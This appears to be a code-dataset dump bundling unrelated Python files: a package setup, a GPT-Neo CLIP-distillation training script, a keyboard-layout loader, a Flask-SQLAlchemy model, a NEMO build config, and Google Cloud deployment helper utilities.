code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from setuptools import setup
# Package metadata for pyunlvrtm.
# Fix: corrected the typo "faciliate" -> "facilitate" in the description
# string that is published as package metadata.
setup(name='pyunlvrtm',
      version='0.2.4',
      description='Python packages to facilitate the UNL-VRTM model',
      url='https://github.com/xxu2/pyunlvrtm',
      author='<NAME>',
      author_email='<EMAIL>',
      license='MIT',
      packages=['pyunlvrtm'],
      test_suite='nose.collector',
      tests_require=['nose'],
      zip_safe=False)
| [
"setuptools.setup"
] | [((30, 343), 'setuptools.setup', 'setup', ([], {'name': '"""pyunlvrtm"""', 'version': '"""0.2.4"""', 'description': '"""Python packages to faciliate the UNL-VRTM model"""', 'url': '"""https://github.com/xxu2/pyunlvrtm"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""MIT"""', 'packages': "['pyunlvrtm']", 'test_suite': '"""nose.collector"""', 'tests_require': "['nose']", 'zip_safe': '(False)'}), "(name='pyunlvrtm', version='0.2.4', description=\n 'Python packages to faciliate the UNL-VRTM model', url=\n 'https://github.com/xxu2/pyunlvrtm', author='<NAME>', author_email=\n '<EMAIL>', license='MIT', packages=['pyunlvrtm'], test_suite=\n 'nose.collector', tests_require=['nose'], zip_safe=False)\n", (35, 343), False, 'from setuptools import setup\n')] |
from transformers import GPTNeoModel, GPTNeoForCausalLM,\
GPT2Tokenizer, GPTNeoConfig, AdamW
from torch.utils.data import IterableDataset, DataLoader
from lm_dataformat import *
import torch
import torch.nn.functional as F
from torch.nn.functional import normalize, cross_entropy
from torch.nn import DataParallel
from auto_tqdm import tqdm
from get_args import get_args
import deepspeed
# Parse command-line arguments (deepspeed config, checkpoint dirs, ...).
args = get_args()
# NOTE(review): `device` is computed but model placement below uses
# model_engine.local_rank instead -- this variable looks unused.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#create model, set neo_hidden
conf = GPTNeoConfig.from_pretrained("EleutherAI/gpt-neo-1.3B")
# Trade compute for memory during backprop.
conf.gradient_checkpointing = True
model = GPTNeoForCausalLM.from_pretrained("EleutherAI/gpt-neo-1.3B", config=conf)
model.training = True
tokenizer = GPT2Tokenizer.from_pretrained("EleutherAI/gpt-neo-1.3B")
neo_hidden = model.config.hidden_size
#resize token embeddings. Two extra tokens
# The two extra slots hold the <|CLIP|> token and the [PAD] token that
# DistillDataset registers on the tokenizer.
model.resize_token_embeddings(len(tokenizer)+2)
#Set up deep speed
model_engine, optimizer, _, _ = deepspeed.initialize(args=args,
model=model,
model_parameters=model.parameters())
model_engine.to(model_engine.local_rank)
#Initialize a random projection matrix
# Maps GPT-Neo hidden states (neo_hidden) down to the CLIP latent size.
clip_hidden = 512
projection = torch.nn.Linear(neo_hidden, clip_hidden, bias=False).to(model_engine.local_rank)
#hparams
temperature = 1.0
# NOTE(review): learning_rate, weight_decay and grad_accum are not read
# anywhere in this file -- presumably consumed via the deepspeed JSON
# config instead; confirm before relying on them.
learning_rate = 5e-5
weight_decay = 0
grad_accum = 2
clip_bs = 48
lambda_coeff = 1.0 #relative scale for contrastive loss
# Kept as a tensor so clip_loss can call temp_tensor.exp().
temp_tensor = torch.tensor(temperature).to(model_engine.local_rank)
#pytorch dataset for clip juicing
class DistillDataset(IterableDataset):
    """Iterable dataset that alternates between CLIP batches and Pile text.

    Every other __next__ call yields a contrastive (CLIP) batch of
    clip_batch_size caption/latent pairs; the calls in between yield a
    single Pile document for autoregressive training.  Each yielded dict
    contains the tokenizer outputs plus 'latent_vecs', 'clip_idx' and the
    'use_distill' flag telling the training loop which loss to apply.
    """
    def __init__(self,\
tokenizer, clip_batch_size,
clip_dataset_dir, pile_dataset_dir,
special_token = "<|CLIP|>", steps = 1e6):
        """Set up streaming readers for both corpora and extend the tokenizer.

        Args:
            tokenizer: HuggingFace tokenizer; gains `special_token` and a
                [PAD] token (the caller must resize model embeddings).
            clip_batch_size: number of caption/latent pairs per CLIP batch.
            clip_dataset_dir: lm_dataformat archive of CLIP captions+latents.
            pile_dataset_dir: lm_dataformat archive of Pile text.
            special_token: marker appended to captions; its hidden state is
                used as the predicted CLIP embedding.
            steps: nominal dataset length reported by __len__.
        """
        self.clip_dataset_dir = clip_dataset_dir
        self.pile_dataset_dir = pile_dataset_dir
        self.clip_rdr = Reader(self.clip_dataset_dir).stream_data(get_meta=True)
        self.pile_rdr = Reader(self.pile_dataset_dir).stream_data(get_meta=True)
        #Steps is the total number of elements we should use. Half from CLIP, half from AR
        self.steps = steps
        #How many elements are in a single contrastive clip batch
        self.clip_batch_size = clip_batch_size
        #Start on an example of WIT.
        self.cur_clip = True
        #Store special token, add to tokenizer. Remember to resize token embeddings on model!
        self.tokenizer = tokenizer
        self.special_token=special_token
        #Get the index for the special token so that we can adjust the decode mask accordingly.
        self.special_token_idx=len(self.tokenizer)
        self.tokenizer.add_tokens([special_token])
        self.tokenizer.add_special_tokens({'pad_token': '[PAD]'})
    def __len__(self):
        # NOTE(review): __next__ below never raises StopIteration, so this
        # length is advisory only (used for the progress bar total).
        return int(self.steps)
    def __iter__(self):
        return self
    def __next__(self):
        """Yield the next batch dict, alternating Pile and CLIP sources."""
        tok = self.tokenizer
        txts = list()
        img_latents = list()
        #Return an element from the pile
        if not self.cur_clip:
            text, _ =next(self.pile_rdr)
            txts.append(text)
            #Place holder
            #Tokenize text
            toks = tok.batch_encode_plus(txts, max_length=512, truncation=True, padding="max_length", return_tensors="pt").to(model_engine.local_rank)
            # Zero latent as a placeholder; it is ignored for AR batches.
            img_latents.append([[0]*clip_hidden])
        #Return an element from CLIP
        else:
            txts = list()
            for _ in range(self.clip_batch_size):
                text, img_latent=next(self.clip_rdr)
                #Append special token
                text += "<|CLIP|>"
                txts.append(text)
                img_latents.append([img_latent])
            #Tokenize text
            toks = tok.batch_encode_plus(txts, max_length=128, truncation=True, padding="max_length", return_tensors="pt").to(model_engine.local_rank)
        #Get the index of the clip tokens.
        # Position of the last real token in each row (attention-mask sum
        # minus one); for CLIP rows that is the <|CLIP|> token.
        clip_idx = (torch.sum(toks.attention_mask, dim=-1).to("cpu") - torch.tensor([1] * len(txts)))
        #Get latent vectors
        latents = torch.cat([torch.tensor(x) for x in img_latents], dim=0).to(model_engine.local_rank)
        cc = self.cur_clip
        #Flip cur clip
        self.cur_clip = not self.cur_clip
        return {
            **toks,
            'latent_vecs' : latents,
            'clip_idx' : clip_idx,
            'use_distill' : cc,
        }
#Contrastive loss helper function
def clip_loss(a, b, temp):
    """Symmetric contrastive (CLIP-style) loss between two embedding batches.

    Args:
        a: (batch x dim) tensor of predicted embeddings.
        b: (batch x dim) tensor of target embeddings.
        temp: scalar tensor; similarities are scaled by temp.exp().

    Returns:
        Mean of the row-wise and column-wise cross-entropy losses.
    """
    n_rows = a.shape[0]
    a_unit = normalize(a, p=2, dim=1).squeeze().to(torch.float32)
    b_unit = normalize(b, p=2, dim=1).squeeze().to(torch.float32)
    # Pairwise cosine similarities scaled by the exponentiated temperature.
    sim = (a_unit @ b_unit.t()) * temp.exp()
    # Matching pairs sit on the diagonal of the similarity matrix.
    targets = torch.arange(n_rows).to(model_engine.local_rank)
    # Average the two directions (a->b and b->a).
    return (cross_entropy(sim, targets) + cross_entropy(sim.T, targets)) / 2.0
def ar_loss(out_embeds, inp):
    """Summed negative log-likelihood of the shifted target tokens.

    Args:
        out_embeds: model output dict; 'logits' has a leading batch dim of 1.
        inp: input ids of shape [1, b, seq].

    Returns:
        Scalar tensor: the negated sum of per-token log-probabilities, with
        CLIP/padding tokens (ids >= 50257) masked out of the sum.
    """
    log_probs = F.log_softmax(out_embeds['logits'].squeeze(0), dim=-1).to(torch.float32)
    # Predict token t+1 from position t: drop the final prediction and the
    # first target.
    shifted_preds = log_probs[:, :-1]
    targets = inp.squeeze(0)[:, 1:]
    # Log-probability assigned to each actual next token.
    token_logprob = torch.gather(shifted_preds, 2, targets.unsqueeze(-1)).squeeze(-1)
    # Ids >= 50257 are the added <|CLIP|>/[PAD] tokens; exclude them.
    keep_mask = (targets < 50257).to(torch.int)
    return -(token_logprob * keep_mask).sum()
#Load dataset
# Build the alternating CLIP/Pile dataset and wrap it in a DataLoader.
data = DistillDataset(tokenizer = tokenizer, clip_batch_size = clip_bs,\
clip_dataset_dir = "../../clip/",\
pile_dataset_dir = "../../val.jsonl.zst")
loader = DataLoader(dataset=data, batch_size=1)
#Check to see if a checkpoint exists. if it does, load that. Otherwise assume we are on step zero.
# NOTE(review): `loader_to_step` is not defined anywhere in this file, and
# the bare `except` will silently swallow that NameError (and any other
# error) -- confirm where loader_to_step comes from and narrow the except.
try:
    _, client_sd = model_engine.load_checkpoint(args.load_dir, args.ckpt_id)
    step = client_sd['step']
    loader_to_step(loader, step+1)
except:
    step = 0
#Set up progress bar
pbar = tqdm(enumerate(loader), total=len(data))
loss_progress = 0.0
loss_step_count = 0
#Update the pbar description every 20 batches
report_loss_every = 20
#save every 10000 batches
save_every = 10000
for batch, data_elem in pbar:
    torch.cuda.empty_cache()
    model_input = {
        'input_ids':data_elem['input_ids'],
        'attention_mask':data_elem['attention_mask'],
    }
    loss = None
    # compute model once for both CLIP and AR
    model_out = model_engine(**model_input, return_dict=True, output_hidden_states=True)
    out_embeds = model_out['hidden_states']
    #print("Layers:\n\n")
    #print(out_embeds[-1])
    #print("Logits:\n\n")
    #print(model_out['logits'])
    # debug shapes
    #print([(k, v.shape if isinstance(v, torch.Tensor) else v) for k, v in data_elem.items()])
    #If we are currently using contrastive loss
    if data_elem['use_distill']:
        #out_embeds ~ (b x seq_len x hidden_size)
        idx = data_elem['clip_idx']
        last_layer = out_embeds[-1].squeeze() # -1 for last layer
        #Get predicted clip embedding. Grab from sequence_len dimension
        # One hidden state per caption, taken at the <|CLIP|> token position.
        clip_embeds = torch.zeros((data.clip_batch_size, neo_hidden)).to(model_engine.local_rank)
        for i,j in enumerate(idx.tolist()[0]):
            clip_embeds[i] = last_layer[i][j]
        #Project to the correct size
        clip_embeds = projection(clip_embeds)
        #Compute contrastive loss
        loss = lambda_coeff * clip_loss(clip_embeds, data_elem['latent_vecs'], temp_tensor)
    else:
        #compute AR loss if Pile data
        # Normalize the summed NLL by the number of real tokens.
        n_text_toks = data_elem['clip_idx'].sum()
        loss = ar_loss(model_out, data_elem['input_ids']) / n_text_toks
    #loss = model_engine(batch)
    print(loss)
    # Skip optimizer steps on NaN losses.
    if not torch.any(loss.isnan()):
        model_engine.backward(loss.to(torch.float32))
        model_engine.step()
        loss_progress += loss.to(torch.float32).detach().cpu().item()
        loss_step_count += 1
    #Update loss progress
    # NOTE(review): if every loss in a reporting window was NaN,
    # loss_step_count is 0 here and this division raises ZeroDivisionError.
    if (batch+1)%report_loss_every==0:
        loss_progress /= float(loss_step_count)
        pbar.set_description("Current loss: " + str(loss_progress))
        loss_progress = 0.0
        loss_step_count = 0
    #Save model
    # NOTE(review): on a fresh run (no checkpoint loaded) `client_sd` is
    # never defined, so this save path raises NameError; `step` is also
    # never incremented, and using loss.item() as ckpt_id is unusual --
    # confirm the intended checkpoint naming.
    if (batch+1)%save_every==0:
        torch.distributed.barrier()
        client_sd['step'] = step
        ckpt_id = loss.item()
        model_engine.save_checkpoint(args.save_dir, ckpt_id, client_sd=client_sd)
        #model.save_pretrained("GPT-Neo-Enriched"+str(batch+1))
        tokenizer.save_pretrained("GPT-Neo-Enriched"+str(batch+1))
# Final save after the loop (ckpt_id/client_sd must exist by this point).
model_engine.save_checkpoint(args.save_dir, ckpt_id, client_sd=client_sd)
#model.save_pretrained("GPT-Neo-Enriched")
tokenizer.save_pretrained("GPT-Neo-Enriched")
| [
"torch.distributed.barrier",
"transformers.GPT2Tokenizer.from_pretrained",
"get_args.get_args",
"torch.nn.functional.normalize",
"torch.tensor",
"transformers.GPTNeoConfig.from_pretrained",
"torch.cuda.is_available",
"torch.einsum",
"torch.nn.Linear",
"torch.utils.data.DataLoader",
"torch.nn.fun... | [((401, 411), 'get_args.get_args', 'get_args', ([], {}), '()\n', (409, 411), False, 'from get_args import get_args\n'), ((520, 575), 'transformers.GPTNeoConfig.from_pretrained', 'GPTNeoConfig.from_pretrained', (['"""EleutherAI/gpt-neo-1.3B"""'], {}), "('EleutherAI/gpt-neo-1.3B')\n", (548, 575), False, 'from transformers import GPTNeoModel, GPTNeoForCausalLM, GPT2Tokenizer, GPTNeoConfig, AdamW\n'), ((619, 692), 'transformers.GPTNeoForCausalLM.from_pretrained', 'GPTNeoForCausalLM.from_pretrained', (['"""EleutherAI/gpt-neo-1.3B"""'], {'config': 'conf'}), "('EleutherAI/gpt-neo-1.3B', config=conf)\n", (652, 692), False, 'from transformers import GPTNeoModel, GPTNeoForCausalLM, GPT2Tokenizer, GPTNeoConfig, AdamW\n'), ((727, 783), 'transformers.GPT2Tokenizer.from_pretrained', 'GPT2Tokenizer.from_pretrained', (['"""EleutherAI/gpt-neo-1.3B"""'], {}), "('EleutherAI/gpt-neo-1.3B')\n", (756, 783), False, 'from transformers import GPTNeoModel, GPTNeoForCausalLM, GPT2Tokenizer, GPTNeoConfig, AdamW\n'), ((5616, 5654), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'data', 'batch_size': '(1)'}), '(dataset=data, batch_size=1)\n', (5626, 5654), False, 'from torch.utils.data import IterableDataset, DataLoader\n'), ((6181, 6205), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (6203, 6205), False, 'import torch\n'), ((444, 469), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (467, 469), False, 'import torch\n'), ((1269, 1321), 'torch.nn.Linear', 'torch.nn.Linear', (['neo_hidden', 'clip_hidden'], {'bias': '(False)'}), '(neo_hidden, clip_hidden, bias=False)\n', (1284, 1321), False, 'import torch\n'), ((1516, 1541), 'torch.tensor', 'torch.tensor', (['temperature'], {}), '(temperature)\n', (1528, 1541), False, 'import torch\n'), ((4716, 4765), 'torch.einsum', 'torch.einsum', (['"""i d, j d -> i j"""', 'a_normd', 'b_normd'], {}), "('i d, j d -> i j', a_normd, b_normd)\n", (4728, 4765), False, 'import 
torch\n'), ((4858, 4887), 'torch.nn.functional.cross_entropy', 'cross_entropy', (['logits', 'labels'], {}), '(logits, labels)\n', (4871, 4887), False, 'from torch.nn.functional import normalize, cross_entropy\n'), ((4890, 4921), 'torch.nn.functional.cross_entropy', 'cross_entropy', (['logits.T', 'labels'], {}), '(logits.T, labels)\n', (4903, 4921), False, 'from torch.nn.functional import normalize, cross_entropy\n'), ((8198, 8225), 'torch.distributed.barrier', 'torch.distributed.barrier', ([], {}), '()\n', (8223, 8225), False, 'import torch\n'), ((4793, 4817), 'torch.arange', 'torch.arange', (['batch_size'], {}), '(batch_size)\n', (4805, 4817), False, 'import torch\n'), ((7083, 7130), 'torch.zeros', 'torch.zeros', (['(data.clip_batch_size, neo_hidden)'], {}), '((data.clip_batch_size, neo_hidden))\n', (7094, 7130), False, 'import torch\n'), ((3975, 4013), 'torch.sum', 'torch.sum', (['toks.attention_mask'], {'dim': '(-1)'}), '(toks.attention_mask, dim=-1)\n', (3984, 4013), False, 'import torch\n'), ((4583, 4607), 'torch.nn.functional.normalize', 'normalize', (['a'], {'p': '(2)', 'dim': '(1)'}), '(a, p=2, dim=1)\n', (4592, 4607), False, 'from torch.nn.functional import normalize, cross_entropy\n'), ((4650, 4674), 'torch.nn.functional.normalize', 'normalize', (['b'], {'p': '(2)', 'dim': '(1)'}), '(b, p=2, dim=1)\n', (4659, 4674), False, 'from torch.nn.functional import normalize, cross_entropy\n'), ((4114, 4129), 'torch.tensor', 'torch.tensor', (['x'], {}), '(x)\n', (4126, 4129), False, 'import torch\n')] |
from enum import Enum
from importlib import resources
import sys
from typing import Dict
import yaml
current_module = sys.modules[__name__]
YAML_EXTENSION = '.yaml'
# the key names come from keyboardlayout.keyconstant
def __generate_keyboard_layout_enum():
    """Build the str-valued LayoutName enum from the bundled layout YAMLs.

    Scans this package's resources for *.yaml files and creates one enum
    member per layout, keyed by the upper-cased file stem.
    """
    stems = [
        resource[:-len(YAML_EXTENSION)]
        for resource in resources.contents(current_module)
        if resource.endswith(YAML_EXTENSION)
    ]
    enum_cls = Enum(
        'LayoutName',
        {stem.upper(): stem for stem in stems},
        type=str,
    )
    enum_cls.__doc__ = (
        "An enum that holds the allowed layout names")
    return enum_cls
LayoutName = __generate_keyboard_layout_enum()
def get_layout(layout_name: LayoutName) -> Dict:
    """Load and parse the packaged YAML file for the given layout.

    Args:
        layout_name: a LayoutName enum member naming the layout.

    Returns:
        The parsed layout as a dict.

    Raises:
        ValueError: if layout_name is not a LayoutName member.
    """
    if not isinstance(layout_name, LayoutName):
        raise ValueError(
            'Invalid input type, layout_name must be type LayoutName')
    resource_name = layout_name.value + YAML_EXTENSION
    raw_text = resources.read_text(current_module, resource_name)
    return yaml.safe_load(raw_text)
class VerticalAnchor(Enum):
    """Enums used to set vertical text location"""
    TOP = 't'     # anchor text to the top edge
    MIDDLE = 'm'  # anchor text to the vertical center
    BOTTOM = 'b'  # anchor text to the bottom edge
class HorizontalAnchor(Enum):
    """Enums used to set horizontal text location"""
    LEFT = 'l'    # anchor text to the left edge
    CENTER = 'c'  # anchor text to the horizontal center
    RIGHT = 'r'   # anchor text to the right edge
class LayoutConstant:
    """Constants used to access data in keyboard layout yaml files"""
    # Each value is a key name expected in the layout YAML documents.
    KEY_SIZE = 'key_size'
    ROWS = 'rows'
    NAME = 'name'
    LOCATION = 'location'
    SIZE = 'size'
    TXT_INFO = 'txt_info'
    KEYS = 'keys'
| [
"yaml.safe_load",
"importlib.resources.contents",
"importlib.resources.read_text"
] | [((303, 337), 'importlib.resources.contents', 'resources.contents', (['current_module'], {}), '(current_module)\n', (321, 337), False, 'from importlib import resources\n'), ((1034, 1087), 'importlib.resources.read_text', 'resources.read_text', (['current_module', 'layout_file_name'], {}), '(current_module, layout_file_name)\n', (1053, 1087), False, 'from importlib import resources\n'), ((1101, 1123), 'yaml.safe_load', 'yaml.safe_load', (['stream'], {}), '(stream)\n', (1115, 1123), False, 'import yaml\n')] |
from app import db, ma
class Participation(db.Model):
    """SQLAlchemy model recording a trucker's participation in an event."""
    __tablename__ = 'participations'

    id = db.Column(db.Integer, primary_key=True)
    event_id = db.Column(db.Integer, nullable=True)
    trucker_whatsapp = db.Column(db.String(120), nullable=True)
    date = db.Column(db.Date, nullable=True)

    def __init__(self, event_id, trucker_whatsapp, date):
        self.event_id = event_id
        self.trucker_whatsapp = trucker_whatsapp
        self.date = date

    def __repr__(self):
        # Fix: was misspelled ``__repr_`` (single trailing underscore), so
        # Python never invoked it for repr(); renamed to the real
        # ``__repr__`` hook.
        return f'<Participation : {self.event_id}, {self.trucker_whatsapp}, {self.date} >'
class ParticipationSchema(ma.Schema):
    """Marshmallow schema for serializing Participation rows."""
    class Meta:
        # Fields exposed when a Participation is dumped.
        fields = ('id', 'event_id', 'trucker_whatsapp', 'date')

# Reusable schema instances: one for single rows, one for collections.
participation_share_schema = ParticipationSchema()
participations_share_schema = ParticipationSchema(many=True)
"app.db.String",
"app.db.Column"
] | [((102, 141), 'app.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (111, 141), False, 'from app import db, ma\n'), ((157, 193), 'app.db.Column', 'db.Column', (['db.Integer'], {'nullable': '(True)'}), '(db.Integer, nullable=True)\n', (166, 193), False, 'from app import db, ma\n'), ((269, 302), 'app.db.Column', 'db.Column', (['db.Date'], {'nullable': '(True)'}), '(db.Date, nullable=True)\n', (278, 302), False, 'from app import db, ma\n'), ((227, 241), 'app.db.String', 'db.String', (['(120)'], {}), '(120)\n', (236, 241), False, 'from app import db, ma\n')] |
#!/usr/bin/env python
import sys,os
# Build configuration for a NEMO setup; requires NEMO_ROOT and NEMO_SITE
# in the environment (KeyError if missing).
root = os.environ['NEMO_ROOT']
site = os.environ['NEMO_SITE']
# Make the nemo helper package importable before the `from nemo import` below.
sys.path.append(os.path.join(root,'scripts'))
from nemo import Makefile
mk = Makefile(
root = root,
sites = site,
flags = dict(PP_N_NODES = 4, PP_KERNEL_DGFV_QMAX = 2, PP_SPLIT_FORM = 0, PP_MESH_PERIODIC = 0),
)
sourcedir = root + '/source'
SETUPDIR = sourcedir + '/setups/euler/3d/self-gravity'
# Active component choices; the commented lines below each group are the
# alternative implementations kept for easy switching.
hydro = root + '/source/flux/euler/dgfv/3d'
#hydro = root + '/source/flux/euler/dgfv/3d/multilevel-lobatto'
#hydro = root + '/source/flux/euler/dgfv/3d/multilevel'
#hydro = root + '/source/flux/euler/dgfv/3d/singlelevel'
#hydro = root + '/source/flux/euler/dgfv/3d/singlelevel-multiflux'
kernel = root + '/source/kernel/dgfv/3d'
#timedisc = root + '/source/timedisc/rungekutta/5-4'
timedisc = root + '/source/timedisc/rungekutta/ssp/5-4'
equations = root + '/source/equations/euler/polytropic/3d'
riemann = equations + '/riemann/rusanov'
#riemann = equations + '/riemann/hllc'
#riemann = hydro + '/riemann/standard/roe'
#riemann = hydro + '/riemann/standard/roe-entropy-fix'
#riemann = hydro + '/riemann/standard/hlle+roe-entropy-fix'
#riemann = hydro + '/riemann/standard/hll'
#riemann = hydro + '/riemann/standard/hllc'
#riemann = hydro + '/riemann/standard/hllm'
#riemann = hydro + '/riemann/standard/entropy-stable'
#riemann = hydro + '/riemann/multidim/rusanov'
#riemann = hydro + '/riemann/multidim/chandrashekar'
#twopoint = hydro + '/equations/polytropic/two_point_flux/standard'
#twopoint = hydro + '/equations/polytropic/two_point_flux/kennedy-gruber'
#twopoint = hydro + '/equations/polytropic/two_point_flux/chandrashekar'
#twopoint = hydro + '/equations/polytropic/two_point_flux/schnuecke'
#mk.add(twopoint + '/two_point_flux_mod.f90')
# Register all Fortran sources with the Makefile generator.
mk.add(root + '/source/share_mod.f90')
mk.add(root + '/source/driver_mod.f90')
mk.add(root + '/source/runtime_mod.f90')
mk.add(root + '/source/common/*.f90')
mk.add(root + '/source/mesh/*.f90')
mk.add(root + '/source/mesh/bindings/*.f90')
mk.add(root + '/source/checkpoint/base/*.f90')
mk.add(root + '/source/checkpoint/hdf5/p4est/*.f90')
mk.add(riemann + '/*.f90')
mk.add(equations + '/*.f90')
mk.add(kernel,'*.f90')
mk.add(timedisc,'*.f90')
mk.add(SETUPDIR + '/modules/*_mod.f90')
# mk.add(SETUPDIR + '/modules/setup_amr_mod.f90')
# mk.add(SETUPDIR + '/modules/setup_amr_sensor_mod.f90')
# mk.add(SETUPDIR + '/modules/setup_amr_types_mod.f90')
# Emit the Makefile.
mk.generate()
| [
"os.path.join"
] | [((117, 146), 'os.path.join', 'os.path.join', (['root', '"""scripts"""'], {}), "(root, 'scripts')\n", (129, 146), False, 'import sys, os\n')] |
"""Utility functions for the project deployment scripts."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json
import os
import string
import subprocess
import sys
import tempfile
from absl import flags
import jsonschema
import ruamel.yaml
from deploy.utils import runner
FLAGS = flags.FLAGS
# Schema file for project configuration YAML files.
_PROJECT_CONFIG_SCHEMA = os.path.join(
os.path.dirname(__file__), '../project_config.yaml.schema')
# Retrieve all files matching the pattern and add them into import_files.
IMPORT_PATTERN_TAG = 'imports'
# Merge the files in import_files into the dict where it is declared.
IMPORT_FILES_TAG = 'import_files'
def normalize_path(path):
  """Normalizes paths specified through a local run or Bazel invocation.

  Expands ~ and environment variables.  GCS URLs (gs://...) and absolute
  paths are returned as-is after expansion; relative paths are resolved
  against BUILD_WORKING_DIRECTORY (set by `bazel run`) when present,
  falling back to the current working directory.
  """
  expanded = os.path.expandvars(os.path.expanduser(path))
  if expanded.startswith('gs://'):
    return expanded
  if os.path.isabs(expanded):
    return expanded
  launch_dir = os.environ.get('BUILD_WORKING_DIRECTORY', os.getcwd())
  return os.path.abspath(os.path.join(launch_dir, expanded))
def wait_for_yes_no(text):
  """Prompt user for Yes/No and return true if Yes/Y. Default to No.

  In dry-run mode no prompt is shown and Yes is assumed.
  """
  if FLAGS.dry_run:
    return True
  while True:
    # raw_input only exists on Python 2; input is the Python 3 equivalent.
    if sys.version_info[0] < 3:
      reply = raw_input(text)
    else:
      reply = input(text)
    if not reply or reply[0] in 'nN':
      # Empty answer or anything starting with n/N defaults to No.
      return False
    if reply[0] in 'yY':
      return True
    # Any other answer: re-prompt.
def read_yaml_file(path):
  """Reads and parses a YAML file.

  Args:
    path (string): The path to the YAML file.

  Returns:
    A dict holding the parsed contents of the YAML file, or None if the file
    could not be read or parsed.
  """
  parser = ruamel.yaml.YAML()
  with open(path, 'r') as stream:
    return parser.load(stream)
def write_yaml_file(contents, path):
  """Saves a dictionary as a YAML file.

  In dry-run mode the file is not written; the would-be contents are echoed
  to stdout instead.

  Args:
    contents (dict): The contents to write to the YAML file.
    path (string): The path to the YAML file.
  """
  writer = ruamel.yaml.YAML()
  writer.default_flow_style = False
  # Always expand anchors/aliases in the output.
  writer.Representer.ignore_aliases = lambda *args: True
  if FLAGS.dry_run:
    print('Contents of {}:'.format(path))
    print('===================================================================')
    writer.dump(contents, sys.stdout)
    print('===================================================================')
    return
  with open(path, 'w') as outfile:
    writer.dump(contents, outfile)
def validate_config_yaml(config):
  """Validates a Project config YAML against the schema.

  Args:
    config (dict): The parsed contents of the project config YAML file.

  Raises:
    jsonschema.exceptions.ValidationError: if the YAML contents do not match
      the schema.
  """
  jsonschema.validate(config, read_yaml_file(_PROJECT_CONFIG_SCHEMA))
def run_deployment(deployment_template, deployment_name, project_id):
  """Creates or updates a Deployment Manager deployment from a template.

  Args:
    deployment_template (dict): The dictionary representation of a deployment
      manager YAML template.
    deployment_name (string): The name for the deployment.
    project_id (string): The project under which to create the deployment.
  """
  # Materialize the template as a temp YAML file for gcloud to consume.
  template_file = tempfile.NamedTemporaryFile(suffix='.yaml')
  write_yaml_file(deployment_template, template_file.name)

  base_cmd = ['deployment-manager', 'deployments']
  if deployment_exists(deployment_name, project_id):
    gcloud_cmd = base_cmd + [
        'update', deployment_name,
        '--config', template_file.name,
        '--delete-policy', 'ABANDON',
    ]
  else:
    gcloud_cmd = base_cmd + [
        'create', deployment_name,
        '--config', template_file.name,
        '--automatic-rollback-on-error',
    ]
  runner.run_gcloud_command(gcloud_cmd, project_id=project_id)

  # Verify the deployment exists (and was not automatically rolled back).
  runner.run_gcloud_command(
      ['deployment-manager', 'deployments', 'describe', deployment_name],
      project_id=project_id)
def deployment_exists(deployment_name, project_id):
  """Determine whether the deployment exists.

  Args:
    deployment_name (string): name of deployment.
    project_id: ID of project.

  Returns:
    bool: True if deployment exists in the projet.
  """
  listing = runner.run_gcloud_command(
      ['deployment-manager', 'deployments', 'list', '--format', 'json'],
      project_id=project_id)
  return any(
      entry['name'] == deployment_name for entry in json.loads(listing))
def create_notification_channel(alert_email, project_id):
  """Creates a new Stackdriver email notification channel.

  Args:
    alert_email (string): The email address to send alerts to.
    project_id (string): The project under which to create the channel.

  Returns:
    A string, the name of the notification channel

  Raises:
    GcloudRuntimeError: when the channel cannot be created.
  """
  # Write the channel definition to a temp YAML file for gcloud.
  config_file = tempfile.NamedTemporaryFile(suffix='.yaml')
  write_yaml_file({
      'type': 'email',
      'displayName': 'Email',
      'labels': {
          'email_address': alert_email,
      },
  }, config_file.name)
  # Create the channel and return its resource name.
  return runner.run_gcloud_command(
      ['alpha', 'monitoring', 'channels', 'create',
       '--channel-content-from-file', config_file.name,
       '--format', 'value(name)'],
      project_id=project_id).strip()
def create_alert_policy(
    resource_types, metric_name, policy_name, description, channel, project_id):
  """Creates a new Stackdriver alert policy for a logs-based metric.

  Args:
    resource_types (list[str]): A list of resource types for the metric.
    metric_name (string): The name of the logs-based metric.
    policy_name (string): The name for the newly created alert policy.
    description (string): A description of the alert policy.
    channel (string): The Stackdriver notification channel to send alerts on.
    project_id (string): The project under which to create the alert.

  Raises:
    GcloudRuntimeError: when command execution returns a non-zero return code.
  """
  config_file = tempfile.NamedTemporaryFile(suffix='.yaml')

  # Build the resource-type clause: '"t"' for one type,
  # 'one_of("t1","t2",...)' for several.
  quoted = ','.join('"{}"'.format(rt) for rt in resource_types)
  if len(resource_types) > 1:
    resource_type_str = 'one_of({})'.format(quoted)
  else:
    resource_type_str = quoted

  alert_filter = ('resource.type={} AND '
                  'metric.type="logging.googleapis.com/user/{}"').format(
                      resource_type_str, metric_name)
  # Send an alert if the metric goes above zero.
  conditions = [{
      'conditionThreshold': {
          'comparison': 'COMPARISON_GT',
          'thresholdValue': 0,
          'filter': alert_filter,
          'duration': '0s',
      },
      'displayName': 'No tolerance on {}!'.format(metric_name),
  }]
  alert_config = {
      'displayName': policy_name,
      'documentation': {
          'content': description,
          'mimeType': 'text/markdown',
      },
      'conditions': conditions,
      'combiner': 'AND',
      'enabled': True,
      'notificationChannels': [channel],
  }
  write_yaml_file(alert_config, config_file.name)

  # Create the new alert policy.
  runner.run_gcloud_command(
      ['alpha', 'monitoring', 'policies', 'create',
       '--policy-from-file', config_file.name],
      project_id=project_id)
def get_gcloud_user():
  """Returns the active authenticated gcloud account."""
  cmd = ['config', 'list', 'account', '--format', 'value(core.account)']
  return runner.run_gcloud_command(cmd, project_id=None).strip()
def get_project_number(project_id):
  """Returns the project number the given project."""
  cmd = ['projects', 'describe', project_id,
         '--format', 'value(projectNumber)']
  return runner.run_gcloud_command(cmd, project_id=None).strip()
def get_deployment_manager_service_account(project_id):
  """Returns the deployment manager service account for the given project."""
  # NOTE(review): '<EMAIL>' looks like a redacted placeholder for the
  # service-account domain suffix -- confirm the real value before use.
  project_number = get_project_number(project_id)
  return 'serviceAccount:{}<EMAIL>'.format(project_number)
